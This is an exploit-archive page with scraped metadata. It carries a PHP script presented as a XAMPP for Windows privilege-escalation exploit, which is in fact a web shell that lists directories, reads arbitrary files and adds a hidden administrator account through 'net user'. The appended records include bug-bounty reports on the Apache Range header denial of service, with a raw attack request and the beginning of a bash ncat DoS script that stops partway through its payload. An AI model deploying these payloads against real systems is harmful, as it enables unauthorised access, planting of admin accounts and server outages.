XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit
2007-08-27T00:00:00
ID 1337DAY-ID-7722 Type zdt Reporter Inphex Modified 2007-08-27T00:00:00
Description
Exploit for unknown platform in category local exploits
===========================================================
XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit
===========================================================
<?php
//Inphex
//htdocs must be accessable and writable,apache must have been ran by root.
//to add a user open like this : script.php?qQx
// Directory of C:\Documents and Settings\Admin
//27.08.2007 16:36 <DIR> .
//27.08.2007 16:36 <DIR> ..
//14.08.2007 14:21 108 .asadminpass
//14.08.2007 14:21 772 .asadmintruststore
//14.08.2007 18:31 <DIR> .exe4j4
//26.08.2007 03:13 427 .glade2
//21.08.2007 16:35 <DIR> .msf3
//10.08.2007 04:41 <DIR> Contacts
//27.08.2007 01:44 129 default.pls
//27.08.2007 17:57 <DIR> Desktop
//23.08.2007 21:12 <DIR>
$qQa = ($_GET['qmB'] == "")?"./":$_GET['qmB'];
$qQd = opendir($qQa);
if (isset($_GET['qrF']))
{
$qrX = fopen($_GET['qrF'],"r");
echo fread($qrX,50000);
exit;
} elseif(isset($_GET['qQx'])) { exec("net user own own /add & net localgroup Administratoren own /add"); echo "User own -> full privileges successfully addet";exit;}
echo "<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>";
echo htmlspecialchars(shell_exec("cd ".$qQa." & dir"));
echo "</textarea>";
while (false !== ($qQr = readdir($qQd))){
switch(filetype($qQa.$qQr))
{
case "dir":
echo "<a href=?qmB=".urlencode(htmlspecialchars(realpath($qQa.$qQr)))."/>".htmlspecialchars($qQr)."</a><br>";
break;
case "file":
echo "<a href=?qrF=".urlencode(htmlspecialchars(realpath($qQa.$qQr))).">".htmlspecialchars($qQr)."</a><br>";
break;
}
}
?>
# 0day.today [2018-02-02] #
{"hash": "8711a57af986101b05a16503a91cad72808a1e7f1c68728822f0c01fbb692b22", "id": "1337DAY-ID-7722", "lastseen": "2018-02-02T03:08:53", "viewCount": 13, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "8ea3cb8f764b9de8d6033617a44e5c24", "key": "href"}, {"hash": "d467548f2ac673867a21d1d1ab7091db", "key": "modified"}, {"hash": "d467548f2ac673867a21d1d1ab7091db", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "09e7a250020aed5a4bf5fca409a426c3", "key": "reporter"}, {"hash": "131ec84f77ffc5902fdfa7d92978c248", "key": "sourceData"}, {"hash": "f9e93a882890b1ec5dfb9d762f26250a", "key": "sourceHref"}, {"hash": "6bc57263910d725e82b00c21c97de392", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "hackerone", "idList": ["H1:88904"]}, {"type": "nessus", "idList": ["ALA_ALAS-2011-1.NASL", "F5_BIGIP_SOL13114.NASL", "SUSE_11_3_APACHE2-110831.NASL", "SUSE_11_4_APACHE2-110831.NASL", "ALA_ALAS-2011-01.NASL", "ORACLELINUX_ELSA-2011-1245.NASL", "REDHAT-RHSA-2011-1294.NASL", "SL_20110831_HTTPD_ON_SL4_X.NASL", "WEBSPHERE_6_1_0_41.NASL", "SUSE_APACHE2-7722.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:18221"]}, {"type": "suse", "idList": ["SUSE-SU-2011:1216-1"]}, {"type": "f5", "idList": ["SOL13114"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/HTTP/APACHE_RANGE_DOS"]}, {"type": "redhat", "idList": ["RHSA-2011:1329", "RHSA-2011:1294"]}], "modified": "2018-02-02T03:08:53"}, "vulnersScore": 7.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/7722", "description": "Exploit for unknown platform in category local exploits", "title": "XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit", "history": [{"bulletin": {"hash": "5b7fbed85f2408c843b1a970b4982e762a0bc11cfa45c30d5f1832100819f8e8", "id": "1337DAY-ID-7722", "lastseen": "2016-04-20T00:12:39", "enchantments": {"score": {"value": 3.6, "modified": "2016-04-20T00:12:39"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ca8b1d3988fada4b330a535abb225c6b", "key": "href"}, {"hash": "bcf0e7b22cfd54a56328b36414671037", "key": "sourceHref"}, {"hash": "09e7a250020aed5a4bf5fca409a426c3", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d467548f2ac673867a21d1d1ab7091db", "key": "modified"}, {"hash": "d467548f2ac673867a21d1d1ab7091db", "key": "published"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "6986ff1f2850fdcf1c5afd988672ac65", "key": "sourceData"}, {"hash": "6bc57263910d725e82b00c21c97de392", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/7722", "description": "Exploit for unknown platform in category local exploits", "viewCount": 6, "title": "XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===========================================================\r\nXAMPP for Windows 1.6.3a Local Privilege Escalation Exploit\r\n===========================================================\r\n\r\n\r\n\r\n<?php\r\n//Inphex\r\n//htdocs must be accessable and writable,apache must have been ran by root.\r\n//to add a user open like this : script.php?qQx\r\n\r\n// Directory of C:\\Documents and Settings\\Admin\r\n\r\n//27.08.2007 16:36 <DIR> .\r\n//27.08.2007 16:36 <DIR> ..\r\n//14.08.2007 14:21 108 .asadminpass\r\n//14.08.2007 14:21 772 .asadmintruststore\r\n//14.08.2007 18:31 <DIR> .exe4j4\r\n//26.08.2007 03:13 427 .glade2\r\n//21.08.2007 16:35 <DIR> .msf3\r\n//10.08.2007 04:41 <DIR> Contacts\r\n//27.08.2007 01:44 129 default.pls\r\n//27.08.2007 17:57 <DIR> Desktop\r\n//23.08.2007 21:12 <DIR> \r\n$qQa = ($_GET['qmB'] == \"\")?\"./\":$_GET['qmB'];\r\n$qQd = opendir($qQa);\r\n\r\nif (isset($_GET['qrF']))\r\n{\r\n $qrX = fopen($_GET['qrF'],\"r\");\r\n echo fread($qrX,50000);\r\n exit;\r\n} elseif(isset($_GET['qQx'])) { exec(\"net user own own /add & net localgroup Administratoren own /add\"); echo \"User own -> full privileges successfully addet\";exit;}\r\necho \"<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>\";\r\necho htmlspecialchars(shell_exec(\"cd \".$qQa.\" & dir\"));\r\necho \"</textarea>\";\r\nwhile (false !== ($qQr = readdir($qQd))){\r\n\r\nswitch(filetype($qQa.$qQr))\r\n {\r\n case \"dir\":\r\n echo \"<a href=?qmB=\".urlencode(htmlspecialchars(realpath($qQa.$qQr))).\"/>\".htmlspecialchars($qQr).\"</a><br>\";\r\n break;\r\n case \"file\":\r\n echo \"<a href=?qrF=\".urlencode(htmlspecialchars(realpath($qQa.$qQr))).\">\".htmlspecialchars($qQr).\"</a><br>\";\r\n break;\r\n }\r\n}\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2007-08-27T00:00:00", "references": [], "reporter": "Inphex", "modified": "2007-08-27T00:00:00", "href": "http://0day.today/exploit/description/7722"}, "lastseen": "2016-04-20T00:12:39", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===========================================================\r\nXAMPP for Windows 1.6.3a Local Privilege Escalation Exploit\r\n===========================================================\r\n\r\n\r\n\r\n<?php\r\n//Inphex\r\n//htdocs must be accessable and writable,apache must have been ran by root.\r\n//to add a user open like this : script.php?qQx\r\n\r\n// Directory of C:\\Documents and Settings\\Admin\r\n\r\n//27.08.2007 16:36 <DIR> .\r\n//27.08.2007 16:36 <DIR> ..\r\n//14.08.2007 14:21 108 .asadminpass\r\n//14.08.2007 14:21 772 .asadmintruststore\r\n//14.08.2007 18:31 <DIR> .exe4j4\r\n//26.08.2007 03:13 427 .glade2\r\n//21.08.2007 16:35 <DIR> .msf3\r\n//10.08.2007 04:41 <DIR> Contacts\r\n//27.08.2007 01:44 129 default.pls\r\n//27.08.2007 17:57 <DIR> Desktop\r\n//23.08.2007 21:12 <DIR> \r\n$qQa = ($_GET['qmB'] == \"\")?\"./\":$_GET['qmB'];\r\n$qQd = opendir($qQa);\r\n\r\nif (isset($_GET['qrF']))\r\n{\r\n $qrX = fopen($_GET['qrF'],\"r\");\r\n echo fread($qrX,50000);\r\n exit;\r\n} elseif(isset($_GET['qQx'])) { exec(\"net user own own /add & net localgroup Administratoren own /add\"); echo \"User own -> full privileges successfully addet\";exit;}\r\necho \"<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>\";\r\necho htmlspecialchars(shell_exec(\"cd \".$qQa.\" & dir\"));\r\necho \"</textarea>\";\r\nwhile (false !== ($qQr = readdir($qQd))){\r\n\r\nswitch(filetype($qQa.$qQr))\r\n {\r\n case \"dir\":\r\n echo \"<a href=?qmB=\".urlencode(htmlspecialchars(realpath($qQa.$qQr))).\"/>\".htmlspecialchars($qQr).\"</a><br>\";\r\n break;\r\n case \"file\":\r\n echo \"<a href=?qrF=\".urlencode(htmlspecialchars(realpath($qQa.$qQr))).\">\".htmlspecialchars($qQr).\"</a><br>\";\r\n break;\r\n }\r\n}\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-02-02] #", "published": "2007-08-27T00:00:00", "references": [], "reporter": "Inphex", "modified": "2007-08-27T00:00:00", "href": "https://0day.today/exploit/description/7722"}
{"hackerone": [{"lastseen": "2018-04-19T17:34:10", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "vulnerability i have found!\n\n| http-vuln-cve2011-3192: \n\n| VULNERABLE:\n\n| Apache byterange filter DoS\n\n| State: VULNERABLE\n\n| IDs: CVE:CVE-2011-3192 OSVDB:74721\n\n| The Apache web server is vulnerable to a denial of service attack when numerous\n\n| overlapping byte ranges are requested.\n\n| Disclosure date: 2011-08-19\n\nAbout Vulnerability\n\nThe byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, exploit called \"Apache Killer\"\n\ni have tested it using nmap and metasploit and is 100% vulnerable\nwhen i found it i tested it in metasploit i used auxiliary/dos/http/apache_range_dos\n\n \n\n\n", "modified": "2016-02-12T13:41:33", "published": "2016-01-25T13:01:41", "id": "H1:112687", "href": "https://hackerone.com/reports/112687", "type": "hackerone", "title": "Gratipay: grtp.co is vulnerable to http-vuln-cve2011-3192", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-19T17:34:10", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "owncloud.com is vulnerable to Apache range header denial of service. This was confirmed by injecting Range: header payloads and analyzing the request vs. response times to an arbitrary page. The results confirm that processing times took up to 50,000 milliseconds per request when the range header values were specified compared to just 1,000 milliseconds when no range header was specified. This was further confirmed by the Server: header field for owncloud which states the running version of Apache is 2.2.17 which is vulnerable to this attack. \r\n\r\nThis is caused by CVE-2011-3192 which means the server (Apache) is running a vulnerable version of Apache (All versions prior to 2.2.20 are vulnerable). The results could also be further compounded in the case of increased threads per host and by using multiple hosts to attack the website using the same attack. \r\n\r\nSee attached evidence for further proof.\r\n\r\nGET / HTTP/1.1 \r\nHost: owncloud.com \r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \r\nAccept-Language: en-US,en;q=0.5 \r\nAccept-Encoding: gzip, deflate \r\nRange: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19,5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29,5-30,5-31,5-32,5-33,5-34,5-35,5-36,5-37,5-38,5-39,5-40,5-41,5-42,5-43,5-44,5-45,5-46,5-47,5-48,5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-110,5-111,5-112,5-113,5-114,5-115,5-116,5-117,5-118,5-119,5-120,5-121,5-122,5-123,5-124,5-125,5-126,5-127,5-128,5-129,5-130,5-131,5-132,5-133,5-134,5-135,5-136,5-137,5-138,5-139,5-140,5-141,5-142,5-143,5-144,5-145,5-146,5-147,5-148,5-149,5-150,5-151,5-152,5-153,5-154,5-155,5-156,5-157,5-158,5-159,5-160,5-161,5-162,5-163,5-164,5-165,5-166,5-167,5-168,5-169,5-170,5-171,5-172,5-173,5-174,5-175,5-176,5-177,5-178,5-179,5-180,5-181,5-182,5-183,5-184,5-185,5-186,5-187,5-188,5-189,5-190,5-191,5-192,5-193,5-194,5-195,5-196,5-197,5-198,5-199,5-200,5-201,5-202,5-203,5-204,5-205,5-206,5-207,5-208,5-209,5-210,5-211,5-212,5-213,5-214,5-215,5-216,5-217,5-218,5-219,5-220,5-221,5-222,5-223,5-224,5-225,5-226,5-227,5-228,5-229,5-230,5-231,5-232,5-233,5-234,5-235,5-236,5-237,5-238,5-239,5-240,5-241,5-242,5-243,5-244,5-245,5-246,5-247,5-248,5-249,5-250,5-251,5-252,5-253,5-254,5-255,5-256,5-257,5-258,5-259,5-260,5-261,5-262,5-263,5-264,5-265,5-266,5-267,5-268,5-269,5-270,5-271,5-272,5-273,5-274,5-275,5-276,5-277,5-278,5-279,5-280,5-281,5-282,5-283,5-284,5-285,5-286,5-287,5-288,5-289,5-290,5-291,5-292,5-293,5-294,5-295,5-296,5-297,5-298,5-299,5-300,5-301,5-302,5-303,5-304,5-305,5-306,5-307,5-308,5-309,5-310,5-311,5-312,5-313,5-314,5-315,5-316,5-317,5-318,5-319,5-320,5-321,5-322,5-323,5-324,5-325,5-326,5-327,5-328,5-329,5-330,5-331,5-332,5-333,5-334,5-335,5-336,5-337,5-338,5-339,5-340,5-341,5-342,5-343,5-344,5-345,5-346,5-347,5-348,5-349,5-350,5-351,5-352,5-353,5-354,5-355,5-356,5-357,5-358,5-359,5-360,5-361,5-362,5-363,5-364,5-365,5-366,5-367,5-368,5-369,5-370,5-371,5-372,5-373,5-374,5-375,5-376,5-377,5-378,5-379,5-380,5-381,5-382,5-383,5-384,5-385,5-386,5-387,5-388,5-389,5-390,5-391,5-392,5-393,5-394,5-395,5-396,5-397,5-398,5-399,5-400,5-401,5-402,5-403,5-404,5-405,5-406,5-407,5-408,5-409,5-410,5-411,5-412,5-413,5-414,5-415,5-416,5-417,5-418,5-419,5-420,5-421,5-422,5-423,5-424,5-425,5-426,5-427,5-428,5-429,5-430,5-431,5-432,5-433,5-434,5-435,5-436,5-437,5-438,5-439,5-440,5-441,5-442,5-443,5-444,5-445,5-446,5-447,5-448,5-449,5-450,5-451,5-452,5-453,5-454,5-455,5-456,5-457,5-458,5-459,5-460,5-461,5-462,5-463,5-464,5-465,5-466,5-467,5-468,5-469,5-470,5-471,5-472,5-473,5-474,5-475,5-476,5-477,5-478,5-479,5-480,5-481,5-482,5-483,5-484,5-485,5-486,5-487,5-488,5-489,5-490,5-491,5-492,5-493,5-494,5-495,5-496,5-497,5-498,5-499,5-500,5-501,5-502,5-503,5-504,5-505,5-506,5-507,5-508,5-509,5-510,5-511,5-512,5-513,5-514,5-515,5-516,5-517,5-518,5-519,5-520,5-521,5-522,5-523,5-524,5-525,5-526,5-527,5-528,5-529,5-530,5-531,5-532,5-533,5-534,5-535,5-536,5-537,5-538,5-539,5-540,5-541,5-542,5-543,5-544,5-545,5-546,5-547,5-548,5-549,5-550,5-551,5-552,5-553,5-554,5-555,5-556,5-557,5-558,5-559,5-560,5-561,5-562,5-563,5-564,5-565,5-566,5-567,5-568,5-569,5-570,5-571,5-572,5-573,5-574,5-575,5-576,5-577,5-578,5-579,5-580,5-581,5-582,5-583,5-584,5-585,5-586,5-587,5-588,5-589,5-590,5-591,5-592,5-593,5-594,5-595,5-596,5-597,5-598,5-599,5-600,5-601,5-602,5-603,5-604,5-605,5-606,5-607,5-608,5-609,5-610,5-611,5-612,5-613,5-614,5-615,5-616,5-617,5-618,5-619,5-620,5-621,5-622,5-623,5-624,5-625,5-626,5-627,5-628,5-629,5-630,5-631,5-632,5-633,5-634,5-635,5-636,5-637,5-638,5-639,5-640,5-641,5-642,5-643,5-644,5-645,5-646,5-647,5-648,5-649,5-650,5-651,5-652,5-653,5-654,5-655,5-656,5-657,5-658,5-659,5-660,5-661,5-662,5-663,5-664,5-665,5-666,5-667,5-668,5-669,5-670,5-671,5-672,5-673,5-674,5-675,5-676,5-677,5-678,5-679,5-680,5-681,5-682,5-683,5-684,5-685,5-686,5-687,5-688,5-689,5-690,5-691,5-692,5-693,5-694,5-695,5-696,5-697,5-698,5-699,5-700,5-701,5-702,5-703,5-704,5-705,5-706,5-707,5-708,5-709,5-710,5-711,5-712,5-713,5-714,5-715,5-716,5-717,5-718,5-719,5-720,5-721,5-722,5-723,5-724,5-725,5-726,5-727,5-728,5-729,5-730,5-731,5-732,5-733,5-734,5-735,5-736,5-737,5-738,5-739,5-740,5-741,5-742,5-743,5-744,5-745,5-746,5-747,5-748,5-749,5-750,5-751,5-752,5-753,5-754,5-755,5-756,5-757,5-758,5-759,5-760,5-761,5-762,5-763,5-764,5-765,5-766,5-767,5-768,5-769,5-770,5-771,5-772,5-773,5-774,5-775,5-776,5-777,5-778,5-779,5-780,5-781,5-782,5-783,5-784,5-785,5-786,5-787,5-788,5-789,5-790,5-791,5-792,5-793,5-794,5-795,5-796,5-797,5-798,5-799,5-800,5-801,5-802,5-803,5-804,5-805,5-806,5-807,5-808,5-809,5-810,5-811,5-812,5-813,5-814,5-815,5-816,5-817,5-818,5-819,5-820,5-821,5-822,5-823,5-824,5-825,5-826,5-827,5-828,5-829,5-830,5-831,5-832,5-833,5-834,5-835,5-836,5-837,5-838,5-839,5-840,5-841,5-842,5-843,5-844,5-845,5-846,5-847,5-848,5-849,5-850,5-851,5-852,5-853,5-854,5-855,5-856,5-857,5-858,5-859,5-860,5-861,5-862,5-863,5-864,5-865,5-866,5-867,5-868,5-869,5-870,5-871,5-872,5-873,5-874,5-875,5-876,5-877,5-878,5-879,5-880,5-881,5-882,5-883,5-884,5-885,5-886,5-887,5-888,5-889,5-890,5-891,5-892,5-893,5-894,5-895,5-896,5-897,5-898,5-899,5-900,5-901,5-902,5-903,5-904,5-905,5-906,5-907,5-908,5-909,5-910,5-911,5-912,5-913,5-914,5-915,5-916,5-917,5-918,5-919,5-920,5-921,5-922,5-923,5-924,5-925,5-926,5-927,5-928,5-929,5-930,5-931,5-932,5-933,5-934,5-935,5-936,5-937,5-938,5-939,5-940,5-941,5-942,5-943,5-944,5-945,5-946,5-947,5-948,5-949,5-950,5-951,5-952,5-953,5-954,5-955,5-956,5-957,5-958,5-959,5-960,5-961,5-962,5-963,5-964,5-965,5-966,5-967,5-968,5-969,5-970,5-971,5-972,5-973,5-974,5-975,5-976,5-977,5-978,5-979,5-980,5-981,5-982,5-983,5-984,5-985,5-986,5-987,5-988,5-989,5-990,5-991,5-992,5-993,5-994,5-995,5-996,5-997,5-998,5-999,5-1000,5-1001,5-1002,5-1003,5-1004,5-1005,5-1006,5-1007,5-1008,5-1009,5-1010,5-1011,5-1012,5-1013,5-1014,5-1015,5-1016,5-1017,5-1018,5-1019,5-1020,5-1021,5-1022,5-1023,5-1024,5-1025,5-1026,5-1027,5-1028,5-1029,5-1030,5-1031,5-1032,5-1033,5-1034,5-1035,5-1036,5-1037,5-1038,5-1039,5-1040,5-1041,5-1042,5-1043,5-1044,5-1045,5-1046,5-1047,5-1048,5-1049,5-1050,5-1051,5-1052,5-1053,5-1054,5-1055,5-1056,5-1057,5-1058,5-1059,5-1060,5-1061,5-1062,5-1063,5-1064,5-1065,5-1066,5-1067,5-1068,5-1069,5-1070,5-1071,5-1072,5-1073,5-1074,5-1075,5-1076,5-1077,5-1078,5-1079,5-1080,5-1081,5-1082,5-1083,5-1084,5-1085,5-1086,5-1087,5-1088,5-1089,5-1090,5-1091,5-1092,5-1093,5-1094,5-1095,5-1096,5-1097,5-1098,5-1099,5-1100,5-1101,5-1102,5-1103,5-1104,5-1105,5-1106,5-1107,5-1108,5-1109,5-1110,5-1111,5-1112,5-1113,5-1114,5-1115,5-1116,5-1117,5-1118,5-1119,5-1120,5-1121,5-1122,5-1123,5-1124,5-1125,5-1126,5-1127,5-1128,5-1129,5-1130,5-1131,5-1132,5-1133,5-1134,5-1135,5-1136,5-1137,5-1138,5-1139,5-1140,5-1141,5-1142,5-1143,5-1144,5-1145,5-1146,5-1147,5-1148,5-1149,5-1150,5-1151,5-1152,5-1153,5-1154,5-1155,5-1156,5-1157,5-1158,5-1159,5-1160,5-1161,5-1162,5-1163,5-1164,5-1165,5-1166,5-1167,5-1168,5-1169,5-1170,5-1171,5-1172,5-1173,5-1174,5-1175,5-1176,5-1177,5-1178,5-1179,5-1180,5-1181,5-1182,5-1183,5-1184,5-1185,5-1186,5-1187,5-1188,5-1189,5-1190,5-1191,5-1192,5-1193,5-1194,5-1195,5-1196,5-1197,5-1198,5-1199,5-1200,5-1201,5-1202,5-1203,5-1204,5-1205,5-1206,5-1207,5-1208,5-1209,5-1210,5-1211,5-1212,5-1213,5-1214,5-1215,5-1216,5-1217,5-1218,5-1219,5-1220,5-1221,5-1222,5-1223,5-1224,5-1225,5-1226,5-1227,5-1228,5-1229,5-1230,5-1231,5-1232,5-1233,5-1234,5-1235,5-1236,5-1237,5-1238,5-1239,5-1240,5-1241,5-1242,5-1243,5-1244,5-1245,5-1246,5-1247,5-1248,5-1249,5-1250,5-1251,5-1252,5-1253,5-1254,5-1255,5-1256,5-1257,5-1258,5-1259,5-1260,5-1261,5-1262,5-1263,5-1264,5-1265,5-1266,5-1267,5-1268,5-1269,5-1270,5-1271,5-1272,5-1273,5-1274,5-1275,5-1276,5-1277,5-1278,5-1279,5-1280,5-1281,5-1282,5-1283,5-1284,5-1285,5-1286,5-1287,5-1288,5-1289,5-1290,5-1291,5-1292,5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299 \r\nConnection: close\r\n\r\n\r\nI also developed the following PoC exploit for this vulnerability:\r\n\r\n#!/bin/bash \r\n# Apache Range Header Denial of Service Exploit by 1N3 @ CrowdShield \r\n# CVE: CVE-2011-3192\r\n# Software: Apache <= all versions prior to 2.2.20 and prior to 2.0.65\r\n# Researcher: 1N3 @ https://crowdshield.com \r\n# Date: 8/21/2015 \r\n#\r\n\r\nTARGET=\"$1\"\r\nPORT=\"$2\"\r\nCMD='ncat'\r\n\r\nif [ -z $TARGET ]; then \r\n\techo \"+ -- --=[Apache Range Header Denial of Service Exploit by 1N3 @ CrowdShield\" \r\n\techo \"+ -- --=[http://crowdshield.com\" \r\n\techo \"+ -- --=[Usage: ./apache_range_dos <target> <port>\" \r\n\techo \"\" \r\n\texit \r\nfi\r\n\r\necho \"+ -- --=[Apache Range Header Denial of Service Exploit by 1N3 @ CrowdShield\" \r\necho \"+ -- --=[http://crowdshield.com\" \r\n\r\nif [ -z $PORT ]; then \r\n\techo \"+ -- --=[Using default port 80/tcp (http)...\"\r\n\tPORT=\"80\" \r\n\tCMD='ncat'\r\nfi\r\n\r\nif [ $PORT -eq \"80\" ]; then \r\n\tPORT=\"80\" \r\n\tCMD='ncat'\r\nfi\r\n\r\nif [ $PORT -eq \"443\" ]; then\r\n\techo \"+ -- --=[Using default SSL port 443/tcp (https)...\"\r\n\tPORT=\"443\"\r\n\tCMD='ncat --ssl'\r\nfi\r\n\r\nBUFFER='Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19,5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29,5-30,5-31,5-32,5-33,5-34,5-35,5-36,5-37,5-38,5-39,5-40,5-41,5-42,5-43,5-44,5-45,5-46,5-47,5-48,5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-110,5-111,5-112,5-113,5-114,5-115,5-116,5-117,5-118,5-119,5-120,5-121,5-122,5-123,5-124,5-125,5-126,5-127,5-128,5-129,5-130,5-131,5-132,5-133,5-134,5-135,5-136,5-137,5-138,5-139,5-140,5-141,5-142,5-143,5-144,5-145,5-146,5-147,5-148,5-149,5-150,5-151,5-152,5-153,5-154,5-155,5-156,5-157,5-158,5-159,5-160,5-161,5-162,5-163,5-164,5-165,5-166,5-167,5-168,5-169,5-170,5-171,5-172,5-173,5-174,5-175,5-176,5-177,5-178,5-179,5-180,5-181,5-182,5-183,5-184,5-185,5-186,5-187,5-188,5-189,5-190,5-191,5-192,5-193,5-194,5-195,5-196,5-197,5-198,5-199,5-200,5-201,5-202,5-203,5-204,5-205,5-206,5-207,5-208,5-209,5-210,5-211,5-212,5-213,5-214,5-215,5-216,5-217,5-218,5-219,5-220,5-221,5-222,5-223,5-224,5-225,5-226,5-227,5-228,5-229,5-230,5-231,5-232,5-233,5-234,5-235,5-236,5-237,5-238,5-239,5-240,5-241,5-242,5-243,5-244,5-245,5-246,5-247,5-248,5-249,5-250,5-251,5-252,5-253,5-254,5-255,5-256,5-257,5-258,5-259,5-260,5-261,5-262,5-263,5-264,5-265,5-266,5-267,5-268,5-269,5-270,5-271,5-272,5-273,5-274,5-275,5-276,5-277,5-278,5-279,5-280,5-281,5-282,5-283,5-284,5-285,5-286,5-287,5-288,5-289,5-290,5-291,5-292,5-293,5-294,5-295,5-296,5-297,5-298,5-299,5-300,5-301,5-302,5-303,5-304,5-305,5-306,5-307,5-308,5-309,5-310,5-311,5-312,5-313,5-314,5-315,5-316,5-317,5-318,5-319,5-320,5-321,5-322,5-323,5-324,5-325,5-326,5-327,5-328,5-329,5-330,5-331,5-332,5-333,5-334,5-335,5-336,5-337,5-338,5-339,5-340,5-341,5-342,5-343,5-344,5-345,5-346,5-347,5-348,5-349,5-350,5-351,5-352,5-353,5-354,5-355,5-356,5-357,5-358,5-359,5-360,5-361,5-362,5-363,5-364,5-365,5-366,5-367,5-368,5-369,5-370,5-371,5-372,5-373,5-374,5-375,5-376,5-377,5-378,5-379,5-380,5-381,5-382,5-383,5-384,5-385,5-386,5-387,5-388,5-389,5-390,5-391,5-392,5-393,5-394,5-395,5-396,5-397,5-398,5-399,5-400,5-401,5-402,5-403,5-404,5-405,5-406,5-407,5-408,5-409,5-410,5-411,5-412,5-413,5-414,5-415,5-416,5-417,5-418,5-419,5-420,5-421,5-422,5-423,5-424,5-425,5-426,5-427,5-428,5-429,5-430,5-431,5-432,5-433,5-434,5-435,5-436,5-437,5-438,5-439,5-440,5-441,5-442,5-443,5-444,5-445,5-446,5-447,5-448,5-449,5-450,5-451,5-452,5-453,5-454,5-455,5-456,5-457,5-458,5-459,5-460,5-461,5-462,5-463,5-464,5-465,5-466,5-467,5-468,5-469,5-470,5-471,5-472,5-473,5-474,5-475,5-476,5-477,5-478,5-479,5-480,5-481,5-482,5-483,5-484,5-485,5-486,5-487,5-488,5-489,5-490,5-491,5-492,5-493,5-494,5-495,5-496,5-497,5-498,5-499,5-500,5-501,5-502,5-503,5-504,5-505,5-506,5-507,5-508,5-509,5-510,5-511,5-512,5-513,5-514,5-515,5-516,5-517,5-518,5-519,5-520,5-521,5-522,5-523,5-524,5-525,5-526,5-527,5-528,5-529,5-530,5-531,5-532,5-533,5-534,5-535,5-536,5-537,5-538,5-539,5-540,5-541,5-542,5-543,5-544,5-545,5-546,5-547,5-548,5-549,5-550,5-551,5-552,5-553,5-554,5-555,5-556,5-557,5-558,5-559,5-560,5-561,5-562,5-563,5-564,5-565,5-566,5-567,5-568,5-569,5-570,5-571,5-572,5-573,5-574,5-575,5-576,5-577,5-578,5-579,5-580,5-581,5-582,5-583,5-584,5-585,5-586,5-587,5-588,5-589,5-590,5-591,5-592,5-593,5-594,5-595,5-596,5-597,5-598,5-599,5-600,5-601,5-602,5-603,5-604,5-605,5-606,5-607,5-608,5-609,5-610,5-611,5-612,5-613,5-614,5-615,5-616,5-617,5-618,5-619,5-620,5-621,5-622,5-623